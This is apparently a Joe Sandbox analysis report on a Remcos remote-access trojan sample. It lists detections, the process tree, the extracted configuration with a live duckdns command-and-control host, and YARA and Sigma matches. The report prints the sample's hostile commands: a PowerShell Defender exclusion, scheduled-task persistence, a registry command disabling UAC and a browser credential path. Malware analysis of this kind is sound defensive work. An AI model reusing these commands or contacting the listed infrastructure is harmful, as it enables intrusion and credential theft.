Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe

Overview

General Information

Sample name:SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
Analysis ID:1544039
MD5:03a6863e7931768c020f1a98531e5212
SHA1:7fbf21510ba0927b16f9de491e6dace95a35c228
SHA256:96e41c2d613926361afebfc693537919269ae11f3ff721eb4f60bf823258e154
Tags:exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe (PID: 5328 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe" MD5: 03A6863E7931768C020F1A98531E5212)
    • powershell.exe (PID: 5356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7404 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5016 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mXJeXQoaGktJCW.exe (PID: 7356 cmdline: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe MD5: 03A6863E7931768C020F1A98531E5212)
    • schtasks.exe (PID: 7636 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mXJeXQoaGktJCW.exe (PID: 7684 cmdline: "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe" MD5: 03A6863E7931768C020F1A98531E5212)
    • mXJeXQoaGktJCW.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe" MD5: 03A6863E7931768C020F1A98531E5212)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["bubemoney7221.duckdns.org:2404:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7XAUXH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "dfgh", "Keylog file max size": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\dfgh\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 19 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              15.2.mXJeXQoaGktJCW.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                15.2.mXJeXQoaGktJCW.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  15.2.mXJeXQoaGktJCW.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    15.2.mXJeXQoaGktJCW.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aab8:$a1: Remcos restarted by watchdog!
                    • 0x6b030:$a3: %02i:%02i:%02i:%03i
                    15.2.mXJeXQoaGktJCW.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64b7c:$str_b2: Executing file:
                    • 0x65bfc:$str_b3: GetDirectListeningPort
                    • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65728:$str_b7: \update.vbs
                    • 0x64ba4:$str_b9: Downloaded file:
                    • 0x64b90:$str_b10: Downloading file:
                    • 0x64c34:$str_b12: Failed to upload file:
                    • 0x65bc4:$str_b13: StartForward
                    • 0x65be4:$str_b14: StopForward
                    • 0x65680:$str_b15: fso.DeleteFile "
                    • 0x65614:$str_b16: On Error Resume Next
                    • 0x656b0:$str_b17: fso.DeleteFolder "
                    • 0x64c24:$str_b18: Uploaded file:
                    • 0x64be4:$str_b19: Unable to delete:
                    • 0x65648:$str_b20: while fso.FileExists("
                    • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 29 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ProcessId: 5356, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ProcessId: 5356, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe, ParentImage: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe, ParentProcessId: 7356, ParentProcessName: mXJeXQoaGktJCW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp", ProcessId: 7636, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", ProcessId: 5016, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ProcessId: 5356, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ParentProcessId: 5328, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp", ProcessId: 5016, ProcessName: schtasks.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: Registry Key setAuthor: Joe Security: Data: Details: 8F EE 8D F4 32 DB 72 B7 D9 E5 13 9E 23 CE 97 2D D5 42 E2 1D CB DC 47 3E 00 95 2B 07 5E C3 E6 F4 44 EB 82 3D 95 5F B7 2A 9A 7D 1E 6E 98 6C 2E 07 D3 5A ED 92 DC 44 F3 EE EB 88 02 E3 9B 4F B5 6C 5D 4B 6B B7 6C 1D 52 45 9A AA 67 1A 91 0D 8D 36 66 3F 6F 2B B8 B8 BE 56 AC 28 4D 42 13 9A 4D 8F 73 2F 5C C5 1A B1 C1 C2 F9 31 EE 3E 1C 4C D3 16 C5 FA 82 F4 B3 7E 3C CD EC 28 BA 88 31 D8 E2 88 E6 20 2C 0A B6 43 52 7B 74 FE 8A 30 39 94 9F 54 50 FF 52 5F 30 D9 85 02 55 29 91 0F 8B 52 26 85 B3 60 0F 78 9E 55 59 14 E5 50 A4 C2 AB 82 AE 98 D2 DB 72 00 F6 9C , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, ProcessId: 7308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-7XAUXH\exepath

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-28T18:37:05.648954+010020327761Malware Command and Control Activity Detected192.168.2.549712103.186.117.772404TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-28T18:37:06.737690+010020327771Malware Command and Control Activity Detected103.186.117.772404192.168.2.549712TCP
                    2024-10-28T18:39:33.065313+010020327771Malware Command and Control Activity Detected103.186.117.772404192.168.2.549712TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-28T18:37:15.238483+010028033043Unknown Traffic192.168.2.549714178.237.33.5080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeAvira: detection malicious, Label: HEUR/AGEN.1362875
                    Found malware configuration
                    Source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["bubemoney7221.duckdns.org:2404:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7XAUXH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "dfgh", "Keylog file max size": ""}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeReversingLabs: Detection: 23%
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeReversingLabs: Detection: 23%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\dfgh\logs.dat, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_004338C8
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_e9711586-d

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00407538 _wcslen,CoGetObject,15_2_00407538
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_10006580 FindFirstFileExA,9_2_10006580
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040928E
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C322
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C388
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004096A0
